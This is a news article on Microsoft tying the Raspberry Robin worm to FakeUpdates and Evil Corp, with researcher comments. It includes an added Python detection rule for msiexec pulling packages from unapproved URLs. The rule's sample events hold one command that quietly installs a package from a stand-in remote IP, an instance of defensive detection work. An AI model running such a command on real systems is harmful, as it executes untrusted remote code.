Microsoft’s security team published evidence this week tying the Raspberry Robin malware to Russian cybercrime syndicate Evil Corp.
In an update to a May report on the ransomware-as-a-service industry, Microsoft Threat Intelligence Center (MSTIC) said some existing Raspberry Robin infections are being used to deploy FakeUpdates, a malware downloader in activity suspected to be linked to Evil Corp.
Raspberry Robin was discovered in September 2021 by researchers from cybersecurity company Red Canary, which coined the name for the cluster of activity it was tracking.
The activity involved a worm that is often installed through USB drives and relies on msiexec.exe to call out to its infrastructure, which Red Canary said is often connected to compromised QNAP devices.
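The execution chain described above (a USB-borne worm that uses the legitimate msiexec.exe to fetch its next stage from remote infrastructure) is the kind of behaviour a detection engineer would want to spot in endpoint telemetry. The following is an added example, not code from the article, Red Canary or Microsoft: it runs a simple rule over constructed Sysmon-style process-creation events and flags msiexec.exe fetching a package from a URL whose host is not on an assumed corporate package-server allowlist. The event field names follow Sysmon Event ID 1, but every host name, path and URL in the sample data is invented, and the exact command-line form the worm uses is an assumption for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation events shaped like Sysmon Event ID 1 fields.
# Every host name, path and URL below is invented for this example.
SAMPLE_EVENTS = [
    {  # benign: interactive install of a local MSI file
        "Image": r"C:\Windows\System32\msiexec.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Windows\System32\msiexec.exe" /i C:\Users\alice\Downloads\tool.msi',
    },
    {  # benign: quiet install from the (assumed) corporate package server
        "Image": r"C:\Windows\System32\msiexec.exe",
        "ParentImage": r"C:\Program Files\Deploy\agent.exe",
        "CommandLine": r"msiexec /qn /i https://pkg.corp.example/agent-1.2.msi",
    },
    {  # suspicious: quiet install straight from an unknown host, spawned by cmd.exe
        "Image": r"C:\Windows\System32\msiexec.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"MSIEXEC /Q /I http://203.0.113.7:8080/a1b2c3",
    },
    {  # unrelated process, must not be flagged
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "notepad.exe",
    },
]

# Hosts from which msiexec is expected to pull packages (assumed allowlist;
# replace with the organisation's real software-distribution hosts).
ALLOWED_PACKAGE_HOSTS = {"pkg.corp.example"}

# Any http(s) URL on the command line; msiexec accepts a URL where a path is expected.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Quiet / unattended install switches: /q, /qn, /qb (slash or dash, any case).
QUIET_FLAG_RE = re.compile(r"(?<!\S)[/-]q[nb]?(?!\S)", re.IGNORECASE)
SCRIPTING_PARENTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event):
    """Return a finding dict when msiexec fetches a package from a URL whose
    host is not allowlisted; return None for everything else."""
    if basename(event.get("Image", "")) != "msiexec.exe":
        return None
    cmdline = event.get("CommandLine", "")
    urls = URL_RE.findall(cmdline)
    if not urls:
        return None  # local .msi path; not what this rule is after
    remote = [u for u in urls
              if (urlparse(u).hostname or "").lower() not in ALLOWED_PACKAGE_HOSTS]
    if not remote:
        return None
    reasons = ["msiexec fetching package from non-allowlisted URL"]
    if QUIET_FLAG_RE.search(cmdline):
        reasons.append("quiet/unattended install flag")
    parent = basename(event.get("ParentImage", ""))
    if parent in SCRIPTING_PARENTS:
        reasons.append(f"spawned by scripting host {parent}")
    return {"urls": remote, "parent": parent, "reasons": reasons}


def scan(events):
    """Run the rule over a batch of events and return the findings."""
    return [f for f in (analyze_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The allowlist matters: pulling an MSI over HTTP is legitimate in environments that distribute software that way, so the remote URL alone is a triage signal rather than a conviction. The quiet flag and a scripting-host parent are added as context to help an analyst prioritise, and the rule deliberately ignores msiexec runs against local files.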
Microsoft said its researchers discovered that the FakeUpdates malware was being delivered via existing Raspberry Robin infections on July 26.
“The DEV-0206-associated FakeUpdates activity on affected systems has since led to follow-on actions resembling DEV-0243 pre-ransomware behavior,” the company wrote.
Microsoft tracks Evil Corp as DEV-0243; DEV-0206 is a separate, as-yet-unnamed access broker the company has identified.
BleepingComputer reported earlier this month that Microsoft sent a private threat intelligence advisory to Microsoft Defender for Endpoint subscribers that the Raspberry Robin worm was found on Windows devices within networks at hundreds of organizations in dozens of industries.
Cybersecurity company Sekoia released its own report confirming that it found Raspberry Robin on QNAP NAS devices. In Red Canary’s initial report on Raspberry Robin, they found that it was targeted at organizations with ties to technology and manufacturing.
Katie Nickels, director of intelligence at Red Canary, told The Record that Microsoft’s finding, if accurate, has filled a “major gap” with Raspberry Robin because no one had previously discovered any later-stage activity or found evidence linking it with any person or entity.
“Many organizations have observed and publicly discussed Raspberry Robin’s initial execution behaviors, but there remained a major gap in that no one seems to have observed any later-stage activity—like an eventual payload,” Nickels said.
“Microsoft’s finding that Raspberry Robin has deployed malware called FakeUpdates/SocGholish is an interesting development. Microsoft is certainly credible, but we can’t independently verify their claim at this time.”
Nickels added that Red Canary continues to see activity from Raspberry Robin but has not been able to associate it with any specific person, company, entity, or country, noting that it’s “too early to say if Evil Corp is responsible for, or associated with, Raspberry Robin.”
She explained that the ransomware-as-a-service ecosystem is complex and different criminal groups often partner with one another to achieve a variety of objectives, making it difficult to work out relationships between malware families and observed activity.
“Microsoft’s findings suggest that the adversaries behind Raspberry Robin may have some kind of relationship with DEV-0206 and DEV-0243, two groups tracked by Microsoft, but the exact nature of that relationship is unclear,” she said.
According to Nickels, Red Canary has not directly observed Raspberry Robin spreading FakeUpdates and is not aware of any clear connection to Evil Corp, DEV-0206, or DEV-0243.
“But we’re watching to see if more evidence emerges to solidify these relationships or if they were simply one-time occurrences,” she said.
Félix Aimé, a member of the threat intelligence team at Sekoia, noted that the main issue with Raspberry Robin revolves around the fact that thousands of infected USB devices are out in the wild and can “download arbitrary payloads from dozens of domain names that can be easily hijacked or re-purposed by malicious actors.”
Evil Corp is known for its connections to multiple ransomware families – including BitPaymer, DoppelPaymer, WastedLocker and Clop – as well as other cybercrime activity. It was sanctioned by the US Treasury Department in December 2019.
In Microsoft’s report this week, the company noted that Evil Corp has begun to deploy the LockBit 2.0 RaaS payload during attacks “likely an attempt…to avoid attribution to their group, which could discourage payment due to their sanctioned status.”